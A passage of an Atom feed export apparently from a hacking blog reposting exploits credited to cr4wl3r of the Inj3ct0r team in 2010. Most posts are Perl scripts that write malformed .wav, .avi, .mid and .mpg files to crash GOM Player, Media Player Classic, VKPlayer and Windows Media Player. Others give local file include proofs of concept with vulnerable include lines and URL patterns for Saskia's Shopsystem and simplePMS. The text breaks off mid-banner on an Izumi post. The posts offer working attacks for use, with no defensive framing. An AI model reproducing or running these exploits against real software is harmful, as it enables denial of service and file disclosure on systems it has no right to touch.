/&gt;"\x00\x3c\x54\x01\x39\x54\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x54\x65\x30".&lt;br /&gt;"\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13".&lt;br /&gt;"\x34\x51\x65\x34\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00".&lt;br /&gt;"\x00\x37\x00\x13\x2b\x51\x65\x2b\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41".&lt;br /&gt;"\x00\x00\x3b\x00\x00\x37\x00\x13\x2f\x51\x65\x2f\x00\x13\x41\x51\x00\x3b\x51\x01".&lt;br /&gt;"\x37\x51\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51".&lt;br /&gt;"\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x51\x65\x34".&lt;br /&gt;"\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13".&lt;br /&gt;"\x35\x51\x65\x35\x00\x13\x3e\x51\x00\x3c\x51\x01\x39\x51\x64\x3e\x00\x00\x3c\x00".&lt;br /&gt;"\x00\x39\x00\x13\x36\x51\x65\x36\x00\x13\x3e\x51\x00\x3d\x51\x01\x39\x51\x64\x3e".&lt;br /&gt;"\x00\x00\x3d\x00\x00\x39\x00\x13\x37\x51\x65\x37\x00\x13\x40\x4e\x00\x3c\x4e\x65".&lt;br /&gt;"\x40\x00\x00\x3c\x00\x13\x34\x4e\x65\x34\x00\x13\x40\x4e\x00\x3c\x4e\x01\x37\x4e".&lt;br /&gt;"\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x3e\x51\x00\x37".&lt;br /&gt;"\x51\x65\x3e\x00\x00\x37\x00\x13\x37\x51\x00\x2b\x51\x81\x5d\x37\x00\x00\x2b\x00".&lt;br /&gt;"\x13\x30\x51\x00\x24\x51\x65\x30\x00\x00\x24\x00\x82\x7c\x29\x51\x64\x29\x00\x13".&lt;br /&gt;"\x40\x52\x00\x3c\x52\x01\x39\x52\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x29\x54".&lt;br /&gt;"\x65\x29\x00\x13\x40\x54\x00\x3c\x54\x01\x39\x54\x64\x40\x00\x00\x3c\x00\x00\x39".&lt;br /&gt;"\x00\x13\x30\x54\x65\x30\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00".&lt;br /&gt;"\x3c\x00\x00\x37\x00\x13\x34\x54\x65\x34\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54".&lt;br /&gt;"\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x54\x65\x2b\x00\x13\x41\x54\x00\x3b".&lt;br /&gt;"\x54\x01\x37\x54\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x2f\x54\x65\x2f\x00\x13".&lt;br /&gt;"\x41\x54\x00\x3b\x54\x01\x37\x54\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x30\x54".&lt;br /&gt;"\x65\x30\x00\x13\x40\x57\x00\x3c\x57\x01\x37\x57\x64\x40\x00\x00\x3c\x00\x00\x37".&lt;br /&gt;"\x00\x13\x30\x57\x65\x30\x00\x13\x40\x57\x00\x3c\x57\x01\x37\x57\x64\x40\x00\x00".&lt;br /&gt;"\x3c\x00\x00\x37\x00\x13\x29\x57\x65\x29\x00\x13\x41\x57\x00\x3c\x57\x01\x39\x57".&lt;br /&gt;"\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x2d\x57\x65\x2d\x00\x13\x41\x57\x00\x3c".&lt;br /&gt;"\x57\x01\x39\x57\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x54\x65\x30\x00\x13".&lt;br /&gt;"\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x54".&lt;br /&gt;"\x65\x34\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37".&lt;br /&gt;"\x00\x13\x39\x54\x00\x2d\x54\x65\x39\x00\x00\x2d\x00\x13\x40\x54\x00\x3c\x54\x01".&lt;br /&gt;"\x39\x54\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x35\x55\x00\x29\x55\x65\x35\x00".&lt;br /&gt;"\x00\x29\x00\x13\x35\x54\x00\x29\x54\x65\x35\x00\x00\x29\x00\x13\x34\x54\x00\x28".&lt;br /&gt;"\x54\x65\x34\x00\x00\x28\x00\x81\x0c\x3c\x54\x00\x30\x54\x81\x5c\x3c\x00\x00\x30".&lt;br /&gt;"\x00\x13\x29\x54\x65\x29\x00\x13\x40\x54\x00\x3c\x54\x01\x39\x54\x64\x40\x00\x00".&lt;br /&gt;"\x3c\x00\x00\x39\x00\x13\x2d\x54\x65\x2d\x00\x13\x40\x54\x00\x3c\x54\x01\x39\x54".&lt;br /&gt;"\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x54\x65\x30\x00\x13\x40\x52\x00\x3c".&lt;br /&gt;"\x52\x01\x37\x52\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x51\x65\x34\x00\x13".&lt;br /&gt;"\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x51".&lt;br /&gt;"\x65\x2b\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00\x3b\x00\x00\x37".&lt;br /&gt;"\x00\x13\x2f\x51\x65\x2f\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00".&lt;br /&gt;"\x3b\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51".&lt;br /&gt;"\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x51\x65\x34\x00\x13\x40\x51\x00\x3c".&lt;br /&gt;"\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x35\x51\x65\x35\x00\x13".&lt;br /&gt;"\x3e\x51\x00\x3c\x51\x01\x39\x51\x64\x3e\x00\x00\x3c\x00\x00\x39\x00\x13\x36\x51".&lt;br /&gt;"\x65\x36\x00\x13\x3e\x51\x00\x3d\x51\x01\x39\x51\x64\x3e\x00\x00\x3d\x00\x00\x39".&lt;br /&gt;"\x00\x13\x37\x51\x65\x37\x00\x13\x40\x51\x00\x3c\x51\x65\x40\x00\x00\x3c\x00\x13".&lt;br /&gt;"\x34\x51\x65\x34\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00".&lt;br /&gt;"\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x3e\x51\x00\x37\x51\x65\x3e\x00\x00\x37".&lt;br /&gt;"\x00\x13\x37\x51\x00\x2b\x51\x81\x5d\x37\x00\x00\x2b\x00\x13\x30\x4f\x00\x24\x4f".&lt;br /&gt;"\x65\x30\x00\x00\x24\x00\x81\x0c\x30\x51\x00\x24\x51\x64\x30\x00\x00\x24\x00\x81".&lt;br /&gt;"\x0c\xff\x2f\x00\x00";&lt;br /&gt;#######################################################################################&lt;br /&gt;open(file, "&gt; sploit.wav");&lt;br /&gt;binmode(file);&lt;br /&gt;print (file $buff);&lt;br /&gt;#######################################################################################&lt;br /&gt;print "\n[+] Done!\n&lt;br /&gt;[+] Open with Gom Player\n&lt;br /&gt;[+] Coded by cr4wl3r\n";&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-294260708924784588?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/294260708924784588/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/gom-player-21214846-wav-buffer-overflow.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/294260708924784588'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/294260708924784588'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/gom-player-21214846-wav-buffer-overflow.html' title='GOM Player 2.1.21.4846 (.wav) Buffer Overflow Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-7024552309323117581</id><published>2010-03-04T10:23:00.001-08:00</published><updated>2010-03-04T10:23:32.054-08:00</updated><title type='text'>Media Player Classic 6.4.9.1 (.avi) Buffer Overflow Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;print "&lt;br /&gt;[+]--------------------------------------------------------------[+]&lt;br /&gt;[+] Media Player Classic 6.4.9.1 (.avi) Buffer Overflow Exploit  [+]&lt;br /&gt;[+] By : cr4wl3r                                                 [+]&lt;br /&gt;[+]--------------------------------------------------------------[+]&lt;br /&gt;";&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;$buff = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";&lt;br /&gt; &lt;br /&gt;open(file, "&gt; sploit.avi");&lt;br /&gt;print (file $buff);&lt;br /&gt;print "\n\n[+] Done!\n&lt;br /&gt;[+] Open with Media Player Classic\n&lt;br /&gt;[+] Coded by cr4wl3r\n";&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-7024552309323117581?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/7024552309323117581/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/media-player-classic-6491-avi-buffer.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/7024552309323117581'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/7024552309323117581'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/media-player-classic-6491-avi-buffer.html' title='Media Player Classic 6.4.9.1 (.avi) Buffer Overflow Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-2073021432577118415</id><published>2010-03-04T10:22:00.002-08:00</published><updated>2010-03-04T10:23:09.558-08:00</updated><title type='text'>VKPlayer 1.0 (.mid) Denial of Service Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;print "&lt;br /&gt;[+]-----------------------------------------------[+]&lt;br /&gt;[+] VKPlayer 1.0 (.mid) Denial of Service Exploit [+]&lt;br /&gt;[+] By : cr4wl3r                                  [+]&lt;br /&gt;[+]-----------------------------------------------[+]&lt;br /&gt;";&lt;br /&gt; &lt;br /&gt;$buff =&lt;br /&gt;"\x52\x49\x46\x46\xff\xff\x00\x00\x52\x4d\x49\x44\x64\x64\x64\x64".&lt;br /&gt;"\xf8\xff\xff\xff\x4d\x54\x68\x64\xff\xff\xff\xff\xf8\xff\xff\xf8".&lt;br /&gt;"\xf8\xff\xff\xff\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".&lt;br /&gt;"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".&lt;br /&gt;"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";&lt;br /&gt;#######################################################################################&lt;br /&gt;open(file, "&gt; sploit.mid");&lt;br /&gt;print (file $buff);&lt;br /&gt;#######################################################################################&lt;br /&gt;print "\n[+] Done!\n&lt;br /&gt;[+] Open with VKPlayer and play\n&lt;br /&gt;[+] Coded by cr4wl3r\n";&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-2073021432577118415?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/2073021432577118415/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/vkplayer-10-mid-denial-of-service.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/2073021432577118415'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/2073021432577118415'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/vkplayer-10-mid-denial-of-service.html' title='VKPlayer 1.0 (.mid) Denial of Service Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-1111555405697250180</id><published>2010-03-04T10:22:00.001-08:00</published><updated>2010-03-04T10:22:40.519-08:00</updated><title type='text'>Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;print "&lt;br /&gt;[+]---------------------------------------------------------------------[+]&lt;br /&gt;[+] Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit  [+]&lt;br /&gt;[+] By : cr4wl3r                                                        [+]&lt;br /&gt;[+]---------------------------------------------------------------------[+]&lt;br /&gt;";&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;$buff = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";&lt;br /&gt; &lt;br /&gt;open(file, "&gt; sploit.mpg");&lt;br /&gt;print (file $buff);&lt;br /&gt;print "\n\n[+] Done...!!!\n&lt;br /&gt;[+] Open with Windows Media Player\n&lt;br /&gt;[+] Coded by cr4wl3r\n";&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-1111555405697250180?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/1111555405697250180/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/windows-media-player-11057215145-mpg.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/1111555405697250180'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/1111555405697250180'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/windows-media-player-11057215145-mpg.html' title='Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-3343775395833923011</id><published>2010-03-04T10:21:00.002-08:00</published><updated>2010-03-04T10:22:09.846-08:00</updated><title type='text'>Saskia's Shopsystem &lt;= beta1 Local File Include Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;###############################################################&lt;br /&gt;Vuln : include("include/_".$id.".php");&lt;br /&gt;###############################################################&lt;br /&gt;PoC : [Saskia_path]/content.php?id=[LFI]&lt;br /&gt;###############################################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3343775395833923011?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/3343775395833923011/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/saskias-shopsystem-beta1-local-file.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3343775395833923011'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3343775395833923011'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/saskias-shopsystem-beta1-local-file.html' title='Saskia&apos;s Shopsystem &lt;= beta1 Local File Include Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-996487430467053555</id><published>2010-03-04T10:21:00.001-08:00</published><updated>2010-03-04T10:21:39.159-08:00</updated><title type='text'>simplePMS &lt;= 0.1.4 Local File Include Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;[+] Code :&lt;br /&gt;&lt;br /&gt;##################################################################&lt;br /&gt;[content.php]&lt;br /&gt;&lt;br /&gt;&lt;?php include("../posts/$filename-posts.php"); ?&gt;&lt;br /&gt;##################################################################&lt;br /&gt;&lt;br /&gt;[+] Example :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   [simplePMS_path]/include/content.php?filename=[LFI]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-996487430467053555?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/996487430467053555/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/simplepms-014-local-file-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/996487430467053555'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/996487430467053555'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/simplepms-014-local-file-include.html' title='simplePMS &lt;= 0.1.4 Local File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-6684481948968834745</id><published>2010-03-04T10:20:00.002-08:00</published><updated>2010-03-04T10:21:04.207-08:00</updated><title type='text'>Izumi &lt;= 1.1.0 (RFI/LFI) Multiple Include Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 